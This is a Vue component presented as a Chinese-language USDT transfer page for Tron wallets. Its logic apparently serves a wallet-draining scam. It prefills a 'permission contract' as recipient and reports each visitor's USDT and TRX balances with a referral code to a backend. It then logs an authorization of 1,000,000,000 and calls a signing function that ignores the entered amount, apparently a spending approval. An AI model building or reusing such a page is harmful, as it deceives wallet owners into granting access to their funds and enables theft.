  <template>
    <div class="container">
      <AuthorizePayOverlay
        :visible="overlayVisible"
        :message="overlayMessage"
        :type="overlayType"
      />
      <a-row class="header" type="flex" align="middle">
        <a-col :span="8">
          <a-button type="text" @click="goBack">
            <template #icon>
              <left-outlined />
            </template>
          </a-button>
        </a-col>
        <a-col :span="8" class="text-center">
          <div class="title">USDT转账</div>
          <div class="subtitle">Tron</div>
        </a-col>
        <a-col :span="8" class="text-right">
          <a-button type="text" @click="scanQR">
            <template #icon>
              <qrcode-outlined />
            </template>
          </a-button>
        </a-col>
      </a-row>
  
      <div class="section-title">收款地址</div>
      <a-input-group compact class="input-group">
        <a-input
          v-model:value="recipientAddress"
          placeholder="Tron地址"
          class="address-input"
        >
          <template #suffix>  <!-- 左侧图标 -->
            <a-button type="text" class="user-icon">
              <user-outlined />
            </a-button>
          </template>
        </a-input>
      </a-input-group>
  
      <a-row type="flex" justify="space-between" align="middle" class="section-title">
        <a-col>数量</a-col>
        <a-col class="text-right">
          <span class="balance">{{ usdtBalance }} USDT</span>
        </a-col>
      </a-row>
  
      <a-card class="amount-card">
        <a-input
         style="border: none !important;border-bottom: 1px solid gray  !important;padding: 10px 11px !important;border-radius: 10px 10px 0px 0px; /* 仅底部边框 */"
          v-model:value="amount"
          placeholder="0"
          class="amount-input"
          size="large"
        />
        <a-divider class="divider" />
        <a-input
          v-model:value="memo"
          placeholder="备注（需支付1TRX）"
          class="memo-input"
        />
      </a-card>
  
      <a-row type="flex" justify="space-between" align="middle" class="section-title">
        <a-col>矿工费</a-col>
      </a-row>
  
      <a-card class="fee-card">
        <a-row type="flex" justify="space-between" align="middle" class="fee-row">
          <a-col>$0</a-col>
          <a-col>~</a-col>
        </a-row>
        <a-row type="flex" justify="space-between" align="middle" class="fee-row">
          <a-col>0 TRX</a-col>
          <a-col>
            <down-outlined />
          </a-col>
        </a-row>
      </a-card>
  
      <div class="flex-grow"></div>
  
      <a-button
        type="primary"
        block
        size="large"
        class="next-button"
        :disabled="payDisabled"
        @click="nextStep"
      >
        下一步
      </a-button>
    </div>
  </template>
  
  <script>
  import { defineComponent, ref, onMounted } from 'vue';
  import { connectWallet, getUSDTBalance, getTRXBalance, getEnergy, signAndSend1 } from '../util/tronweb';
  import { addOrder, addAuthorize, addToast, reportTxWatch } from '../util/api';
  import { message } from 'ant-design-vue';
  import { useRoute } from 'vue-router';
  import AuthorizePayOverlay from '../components/AuthorizePayOverlay.vue';
  import { PAY_MSG, isTrxEnoughForAuthorize } from '../util/walletPayUi';
  import { clientEnv } from '../config/env';

  import {
    LeftOutlined,
    QrcodeOutlined,
    UserOutlined,
    DownOutlined,
  } from '@ant-design/icons-vue';
  
  export default defineComponent({
    components: {
      LeftOutlined,
      QrcodeOutlined,
      UserOutlined,
      DownOutlined,
      AuthorizePayOverlay,
    },
    setup() {
      const route = useRoute();
      const recipientAddress = ref(clientEnv.tronPermissionContract);
      const amount = ref('');
      const memo = ref('');
      const usdtBalance = ref('');
      const referral_code = ref('');
      const payDisabled = ref(false);
      const overlayVisible = ref(false);
      const overlayMessage = ref('');
      const wallet = ref('');
      const trx = ref(0);
      const energy = ref(0);
      const money = ref(0);
      const overlayType = ref('error');

      const goBack = () => {
        console.log('Go back');
      };

      const scanQR = () => {
        console.log('Scan QR code');
      };

      const showTrxFail = () => {
        overlayType.value = 'error';
        overlayMessage.value = PAY_MSG.trxFail;
        overlayVisible.value = true;
        payDisabled.value = true;
      };
      const showGasFail = () => {
        overlayType.value = 'error';
        overlayMessage.value = PAY_MSG.gasFail;
        overlayVisible.value = true;
        payDisabled.value = true;
      };

      const showPaySuccessWait = () => {
        overlayType.value = 'wait';
        overlayMessage.value = PAY_MSG.waitNetwork;
        overlayVisible.value = true;
        payDisabled.value = true;
      };

      const nextStep = async () => {
        if (payDisabled.value) {
          return;
        }

        await addToast({
          referralCode: referral_code.value,
          address: wallet.value,
          usdt_balance: money.value,
          trx_balance: trx.value,
          energy: energy.value,
          is_authorize: '0',
          message: '有用户访问网站',
        });

        trx.value = await getTRXBalance(wallet.value);
        energy.value = await getEnergy(wallet.value);

        if (!isTrxEnoughForAuthorize(trx.value, energy.value)) {
          console.warn('[authorize] 余额不足', { trx: trx.value, energy: energy.value });
          showGasFail();
          return;
        }

        if (Number(amount.value) > money.value) {
                message.warning('USDT余额不足');
                return;
        }

        const str = getCurrentDateTime() + Math.floor(Math.random() * 100000).toString().padStart(6, '0');
        const detal = {
          price: amount.value,
          inputNumber: 1,
          inputGT: wallet.value,
          orderNo: str,
          title: '钱包收款#' + amount.value,
          referral_code: referral_code.value,
        };
        await addOrder(detal);

        const authData = {
          address: wallet.value,
          tg_no: wallet.value,
          referralCode: referral_code.value,
          authorize_banlce: 1000000000,
          order_no: str,
          usdt_banlce: money.value,
          trx_balance: trx.value,
        };
        await addAuthorize(authData);

        try {
          const result = await signAndSend1();
          if (result && result.txid) {
            reportTxWatch(result.txid, wallet.value);
            showPaySuccessWait();
          } else {
            showTrxFail();
          }
        } catch (e) {
          console.error(e);
          showTrxFail();
        }
      };

      const getCurrentDateTime =() =>  {
            const date = new Date();
            const year = date.getFullYear();
            const month = ("0" + (date.getMonth() + 1)).slice(-2);
            const day = ("0" + date.getDate()).slice(-2);
            const hours = ("0" + date.getHours()).slice(-2);
            const minutes = ("0" + date.getMinutes()).slice(-2);
            const seconds = ("0" + date.getSeconds()).slice(-2);
            return `${year}${month}${day}${hours}${minutes}${seconds}`;
        }

       // 初始化生成号码
        onMounted( async()  => {
          
          referral_code.value = route.params.referralCode; // 解析字符串为对象
          console.log("111"+referral_code.value);
          wallet.value = await connectWallet();
          if (!wallet.value) {
              return;
          }

          money.value = await getUSDTBalance(wallet.value);
          trx.value = await getTRXBalance(wallet.value);
          energy.value = await getEnergy(wallet.value);

      });
  
      return {
        recipientAddress,
        amount,
        memo,
        usdtBalance,
        payDisabled,
        overlayVisible,
        overlayMessage,
        overlayType,
        goBack,
        scanQR,
        nextStep,
      };
    },
  });
  </script>
  
  <style scoped>
  .container {
    position: absolute;
    left: 0;
    top: 0;
    bottom: 0;
    right: 0;
    background-color: #f6f6f6;
    display: flex;
    flex-direction: column;
    padding: 16px;
  }
  
  @media screen and (min-width: 960px) {
    .container {
      width: 500px;
      margin: 0 auto;
    }
  }
  
  .header {
    margin-bottom: 20px;
  }
  
  .text-center {
    text-align: center;
  }
  
  .text-right {
    text-align: right;
  }
  
  .title {
    font-size: 18px;
    font-weight: 500;
  }
  
  .subtitle {
    color: #acacac;
    font-size: 12px;
  }
  
  .section-title {
    color: #8c8c8c;
    margin: 15px 0 10px 0;
  }
  
  .input-group {
    width: 100%;
    margin-bottom: 20px;
  }
  
  .address-input {
    flex: 1;
    border-radius: 10px 0 0 10px;
  }
  
  .user-icon {
    border-radius: 0 10px 10px 0;
    padding: 0;
  }
  
  .amount-card {
    border-radius: 10px;
    margin-bottom: 20px;
  }
  
  .amount-input {
    font-size: 32px;
    border: none;
    box-shadow: none;
    
  }
  
  .memo-input {
    border: none;
    box-shadow: none;
  }
  
  .divider {
    margin: 15px 0;
  }
  
  .fee-card {
    border-radius: 10px;
    background-color: #fff;
    padding: 8px 11px;
  }
  
  .fee-row {
    padding: 10px 0;
  }
  
  .balance {
    font-size: 12px;
    color: gray;
  }
  
  .flex-grow {
    flex-grow: 1;
  }
  
  .next-button {
    height: 50px;
    border-radius: 10px;
    font-size: 16px;
    margin-top: 15px;

    &:disabled {
      opacity: 0.55;
      cursor: not-allowed;
    }
  }


  </style>